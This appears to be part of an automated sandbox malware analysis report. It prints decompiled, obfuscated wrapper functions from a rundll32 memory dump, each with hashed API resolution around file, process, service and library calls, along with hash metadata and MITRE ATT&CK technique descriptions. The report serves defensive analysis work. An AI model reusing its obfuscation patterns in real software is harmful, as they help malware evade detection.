				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001607A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0015c6e1
0x0015c6e6
0x0015c6f0
0x0015c6fc
0x0015c703
0x0015c706
0x0015c70d
0x0015c711
0x0015c715
0x0015c71c
0x0015c723
0x0015c72a
0x0015c731
0x0015c738
0x0015c751
0x0015c762
0x0015c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0015C762

Strings

/O, xrefs: 0015C6E6

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: d5ed26cf72832ecb49d13cf9ab3985e6e74c4cc1fff58b7815ffd883fa268c2a
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 8C1133B290122DBBCB25DF94DC498DFBFB8EF14714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00151000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00151000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0015602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001607A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00151006
0x00151009
0x0015100c
0x00151011
0x00151016
0x0015101d
0x00151026
0x0015102d
0x00151034
0x0015103b
0x00151047
0x0015104f
0x00151057
0x0015105e
0x00151065
0x0015106c
0x00151073
0x00151077
0x0015108b
0x00151096
0x0015109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00151096

Strings

[, xrefs: 0015103B

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 54b9cc5cfc9de169c52f0704721a50283e9e3e60aeb4ee946a36a76594836cd0
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: EA015BB6D01308FBDF04DF94C94A5DEBBB1EB54318F108188E81466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00154859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00154859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001607A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0015485e
0x0015487a
0x0015487d
0x00154884
0x0015488b
0x00154892
0x0015489d
0x001548a0
0x001548ad
0x001548b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001548B7

Strings

[, xrefs: 0015488B

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: c5925a5559ec1e2c8523b0b214c18c944e35611bf2b8d22137a4dbd0807b1548
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 31F017B0A05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00164F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00164F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0015602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001607A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00164f80
0x00164f81
0x00164f82
0x00164f86
0x00164f87
0x00164f8c
0x00164fa5
0x00164fa8
0x00164faf
0x00164fb6
0x00164fc7
0x00164fca
0x00164fd7
0x00164fe2
0x00164fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00164FE2

Strings

{#lm, xrefs: 00164FC2

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 95574805c9f8697aeab4083e0bcd9356284d1afab2b99002a27359c9ae796fd6
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 71F037B081120CFFDB04EFA4D94289EBFBAEB44300F208199E804AB250D3715B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 0016976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0016976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0015602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001607A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00169772
0x00169773
0x00169778
0x0016977a
0x0016977b
0x0016977e
0x0016977f
0x00169782
0x00169785
0x00169788
0x00169789
0x0016978c
0x0016978f
0x00169790
0x00169791
0x00169794
0x00169797
0x0016979a
0x0016979d
0x001697a0
0x001697a3
0x001697a6
0x001697a7
0x001697a8
0x001697ad
0x001697b7
0x001697c3
0x001697ca
0x001697d1
0x001697d8
0x001697df
0x001697e3
0x001697fc
0x00169816
0x0016981d

APIs

CreateProcessW.KERNEL32(0015591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0015591A), ref: 00169816

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 2d1b3044ed25c036d9d0276c56801c6b3c6911ac5e628db1c40fe6dc0d8d6120
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6511B372901148FBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0015B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0015602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001607A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0015b569
0x0015b56a
0x0015b56d
0x0015b572
0x0015b574
0x0015b577
0x0015b57a
0x0015b57d
0x0015b580
0x0015b583
0x0015b586
0x0015b587
0x0015b58a
0x0015b58d
0x0015b590
0x0015b593
0x0015b594
0x0015b595
0x0015b59a
0x0015b5a4
0x0015b5b8
0x0015b5c0
0x0015b5c4
0x0015b5cb
0x0015b5d2
0x0015b5d9
0x0015b5e6
0x0015b5fd
0x0015b604

APIs

CreateFileW.KERNELBASE(00160668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00160668,?,?,?,?), ref: 0015B5FD

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 96737d860ab8744cea806fcf91c3a981d8ea52d87862542aa095289d6ab0af9c
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: CE11BF72801248BBDF16DF95DD06CEE7FBAEF99314F148198FA1862160D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0016981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0016981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0015602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001607A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00169821
0x00169822
0x00169825
0x00169828
0x0016982a
0x0016982c
0x0016982f
0x00169832
0x00169835
0x00169836
0x00169837
0x0016983c
0x00169855
0x00169858
0x0016985f
0x00169866
0x0016986d
0x00169874
0x0016987b
0x0016988e
0x0016989b
0x001698a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001587F2,0000CAAE,0000510C,AD82F196), ref: 0016989B

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 6608f21599a3808730e304e590ecf6f2f1fc3feff3573d564b70f5b549554e32
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 16019A72801208FBDB04EFD5DC46CDFBF79EF95310F108188F918A6220E6725B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00167BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00167BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0015602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001607A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00167bf7
0x00167bf8
0x00167bfa
0x00167bfd
0x00167bff
0x00167c02
0x00167c06
0x00167c07
0x00167c0f
0x00167c1d
0x00167c25
0x00167c2d
0x00167c31
0x00167c38
0x00167c3f
0x00167c46
0x00167c4a
0x00167c5e
0x00167c67
0x00167c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00167C67

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: e91fe59551254f1683380c299e0627ebd70b5046cd94913ba8cc756f59ef67e6
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: AE014FB190120CFFEB09DF94C84A8DE7BB5EF54314F108198F80567240E7B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0015F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0015F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0015602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001607A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0015f662
0x0015f663
0x0015f665
0x0015f668
0x0015f66a
0x0015f66d
0x0015f670
0x0015f673
0x0015f677
0x0015f678
0x0015f67d
0x0015f687
0x0015f693
0x0015f69a
0x0015f6a1
0x0015f6a5
0x0015f6a9
0x0015f6b0
0x0015f6c9
0x0015f6d8
0x0015f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0015F6D8

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: f02a7ab0fb1c52eb2bd76e16697e495967375b41ee1c73c936008b74d259ce3d
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 2C01E5B6901208BBEF05AF94DC068DF7F75EB15324F148188F91466250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0015B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0015B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0015602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001607A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0015b6f3
0x0015b6f8
0x0015b702
0x0015b70b
0x0015b712
0x0015b719
0x0015b720
0x0015b727
0x0015b72e
0x0015b747
0x0015b759
0x0015b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0015B759

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 71163dd073e88fe77b58440bece71124d3f262ee13ebbe5aecfc983ce1d4aa33
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 7A012CB5941308FBEB45DF94DD06A9E7BB5EB18704F108188FA0566190D3B25A249B51

Uniqueness

Uniqueness Score: -1.00%

Function 0016AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0016AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0015602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001607A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0016aa3f
0x0016aa40
0x0016aa41
0x0016aa44
0x0016aa47
0x0016aa4b
0x0016aa4c
0x0016aa51
0x0016aa5b
0x0016aa64
0x0016aa68
0x0016aa6f
0x0016aa76
0x0016aa8d
0x0016aa90
0x0016aa9d
0x0016aaa8
0x0016aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0016AAA8

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: f5417b4fd5364be60806f826084f068c82e1eeab89baaefc427886c7c1eab5c6
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 07F069B190020CFFDF08EF94DD4A89EBFB4EB44304F108088F815A7250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00155FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00155FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0015602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001607A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00155fb5
0x00155fb6
0x00155fb7
0x00155fbb
0x00155fbc
0x00155fc1
0x00155fcb
0x00155fd7
0x00155fde
0x00155fe5
0x00155ffc
0x00155fff
0x00156006
0x0015600d
0x0015601a
0x00156025
0x0015602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00156025

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 39c8e43561348df9927a7be24d52ab473e9f3b77650766816518bb0418522836
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 5FF04FB0C11208FFDB08DFA0E94689EBFB8EB50300F208198E809A7260E7725F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
